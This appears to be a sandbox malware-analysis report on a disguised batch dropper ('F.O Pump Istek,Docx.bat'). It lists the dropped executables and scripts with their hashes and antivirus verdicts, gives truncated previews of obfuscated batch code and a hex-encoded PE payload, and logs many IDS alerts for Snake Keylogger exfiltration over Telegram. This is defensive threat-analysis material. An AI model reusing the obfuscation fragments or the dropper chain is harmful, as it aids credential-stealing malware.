                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMud:0wnRQj0KyEB1zcwfPMU
                                                                                                      MD5:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                      SHA1:2D028A4EE44F9B3DD5387DA39490D45F897D7C8F
                                                                                                      SHA-256:BA9C4833DF28503EA4AC99BDE43CE579FE555DC3ABCE36429197C4EC727CE5C3
                                                                                                      SHA-512:8C5A859A3B3D065C63187DBADD621EB71FB8747BBE39B2BB62E00251B747117092BC7791A0A80D7F4034F0255A8B929C270BA603D6B44ED192F94CC4E1802F67
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................$...f.......8.......@....@.......................... ...................@...........................P...&...............................n...................................................W...............................text............................... ..`.itext..L....0...................... ..`.data........@.......(..............@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...n.......p..................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                      C:\Users\Public\Libraries\FX.cmd

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8556
                                                                                                      Entropy (8bit):4.623706637784657
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                      Malicious:false
                                                                                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                      C:\Users\Public\Libraries\NEO.cmd

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):46543
                                                                                                      Entropy (8bit):4.705001079878445
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                      MD5:637A66953F03B084808934ED7DF7192F
                                                                                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                      Malicious:false
                                                                                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                      C:\Users\Public\Libraries\spoolsv.COM

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\kn.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1019392
                                                                                                      Entropy (8bit):7.009304310152198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMud:0wnRQj0KyEB1zcwfPMU
                                                                                                      MD5:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                      SHA1:2D028A4EE44F9B3DD5387DA39490D45F897D7C8F
                                                                                                      SHA-256:BA9C4833DF28503EA4AC99BDE43CE579FE555DC3ABCE36429197C4EC727CE5C3
                                                                                                      SHA-512:8C5A859A3B3D065C63187DBADD621EB71FB8747BBE39B2BB62E00251B747117092BC7791A0A80D7F4034F0255A8B929C270BA603D6B44ED192F94CC4E1802F67
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................$...f.......8.......@....@.......................... ...................@...........................P...&...............................n...................................................W...............................text............................... ..`.itext..L....0...................... ..`.data........@.......(..............@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...n.......p..................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                      C:\Users\Public\Libraries\xzeheenC.pif

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):175800
                                                                                                      Entropy (8bit):6.631791793070417
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                      MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                      SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                      SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                      SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                                                      • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                                                      • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                                                      • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                                                      • Filename: PO11550.exe, Detection: malicious, Browse
                                                                                                      • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                                                      • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                                                      • Filename: tTIYCp2sf4.exe, Detection: malicious, Browse
                                                                                                      • Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious, Browse
                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                      C:\Users\Public\alpha.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):289792
                                                                                                      Entropy (8bit):6.135598950357573
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                                      C:\Users\Public\kn.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):1651712
                                                                                                      Entropy (8bit):6.144018815244304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                                      C:\Users\Public\spoolsv.MPEG

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\kn.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2038786
                                                                                                      Entropy (8bit):3.850506448763226
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:nTawbo9F7U7JIPcBTA/2ntge1ZGsPJmLeOg3hKFSIC09uriZeRwViOp8KB9/8TEj:M
                                                                                                      MD5:6892220C5881083C867B7271AE3242AC
                                                                                                      SHA1:BD4A53C21F1F7A53ED69CD9EC96F606E880D7E50
                                                                                                      SHA-256:DAEF811906FB8D0BC905F712E9EDBC970D17ADC31A5FA5517889B2DCEE73EF22
                                                                                                      SHA-512:B98888601892104B01B1276D467A6DEBB33E26276BE949DDDE68614435D387E26C669F7A6EB549DE28D7C95135FD46B09BFD2FEF7AD543E4E34D31E117D0D722
                                                                                                      Malicious:false
                                                                                                      Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b0102190024070000660800000000000438070000100000004007000000400000100000000200000400000000000000040000000000000000201000000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000500e00b626000000100f00000401000000000000000000000000000000000000a00e008c6e000000000000000000000000000000000000000000000000000000900e0018000000000000000000000000000000000000001c570e00040600000000000000000000000000000000000000000000

                                                                                                      \Device\Null

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\alpha.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):104
                                                                                                      Entropy (8bit):4.403504238247217
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                                                                      MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                                                                      SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                                                                      SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                                                                      SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                                                                      Malicious:false
                                                                                                      Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:ISO-8859 text, with very long lines (965), with CRLF line terminators
                                                                                                      Entropy (8bit):5.14003889014595
                                                                                                      TrID:
                                                                                                        File name:F.O Pump Istek,Docx.bat
                                                                                                        File size:2'966'423 bytes
                                                                                                        MD5:0bdc3aeffe000c9c0c73a3faa2d001d8
                                                                                                        SHA1:1c8bc96bd0e00b21d734f936aeaea1e612442912
                                                                                                        SHA256:e11e4469c9c003f2b0074deada876e15f30afccae6178c5317e16cf5e6ee1ff6
                                                                                                        SHA512:6e577ecc9f09a106bfc32f81ece6e3277f3c02622d12205da0d8efbaf5602d86b6556ed2df576bad9de48c7908122d8ae35008c65ad868822b25b6543865fe83
                                                                                                        SSDEEP:24576:kH1yveXvtJNwYay5+kiD7Dm5c0B58llll8lUWtWJxM9bhHNfbTXr063u95fX7:kVyGftJ+YawbiS5BBUvzM9bhHNfnXm
                                                                                                        TLSH:82D582A32DED06C62B496B7B974FF5589A3BDC3C86C26DC812C725BD100A74B2CD0D5A
                                                                                                        File Content Preview:COMCOM..&@cls&@set "_....=viulzHg htI5f9UEDny7kBLWJSZAC1xTKNR6GmOeQr82qca4jX0@3wPYdsbopVFM"..%_....:~51,1%%_....:~57,1%%_....:~39,1%%_....:~9,1%%_....:~7,1%"_..=%_....:~37,1%%_....:~59,1%%_....:~10,1%%_....:~62,1%%_....:~33,1%%_....:~40,1%%_....:~55,1%%_.

                                                                                                        File Icon

                                                                                                        Icon Hash:9686878b929a9886

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-18T16:30:32.480752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705185.166.143.48443TCP
                                                                                                        2024-12-18T16:30:34.912380+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84970654.231.224.185443TCP
                                                                                                        2024-12-18T16:30:50.688444+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849712149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:02.663613+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849714149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:04.344285+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849716149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:04.689184+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849717149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:06.812386+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849718149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:08.747835+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849719149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:10.704238+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849720149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:10.764252+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849721149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:12.761499+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849722149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:14.686240+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849723149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:15.996167+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849724149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:16.617544+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849725149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:17.934127+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849726149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:18.671712+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849727149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:19.864481+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849728149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:20.612580+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849729149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:21.833676+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849730149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:22.019236+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849731149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:22.591469+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849732149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:23.787992+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849733149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:23.951822+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849734149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:24.551999+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849735149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:25.788542+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849736149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:25.971804+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849737149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:26.500406+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849739149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:27.855490+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849740149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:28.100958+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849741149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:28.522891+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849742149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:29.887429+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849743149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:30.216391+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849744149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:30.472105+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849745149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:31.922710+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849746149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:32.330279+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849747149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:32.616120+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849748149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:33.900100+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849749149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:34.280745+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849750149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:34.590263+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849751149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:35.846578+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849752149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:36.275680+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849753149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:36.524506+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849754149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:37.859210+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849755149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:38.339505+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849756149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:38.535822+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849757149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:39.899974+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849758149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:40.310619+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849759149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:40.653167+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849760149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:41.882588+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849761149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:42.326208+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849763149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:42.640795+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849764149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:43.858813+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849765149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:44.332216+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849766149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:44.995632+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849767149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:45.917770+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849773149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:46.378304+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849774149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:47.006050+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849775149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:47.892071+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849781149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:48.438192+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849782149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:49.073363+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849783149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:50.059103+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849788149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:50.488087+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849789149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:51.012319+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849790149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:52.001020+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849795149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:52.477531+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849796149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:52.945796+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849798149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:53.939476+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849803149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:54.433734+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849804149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:55.158613+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849806149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:56.057954+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849807149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:56.408709+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849812149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:57.187012+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849814149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:58.000494+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849815149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:58.399296+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849820149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:59.117942+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849822149.154.167.220443TCP
                                                                                                        2024-12-18T16:31:59.927636+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849823149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:00.329493+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849824149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:01.052862+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849829149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:01.868337+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849831149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:02.341158+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849832149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:03.019235+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849837149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:03.802557+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849839149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:04.325835+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849840149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:04.948770+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849845149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:05.801697+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849847149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:06.314616+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849848149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:06.968984+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849849149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:07.717327+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849855149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:08.257271+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849856149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:08.901466+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849857149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:09.703549+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849862149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:10.250925+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849864149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:10.902595+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849865149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:11.808175+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849870149.154.167.220443TCP
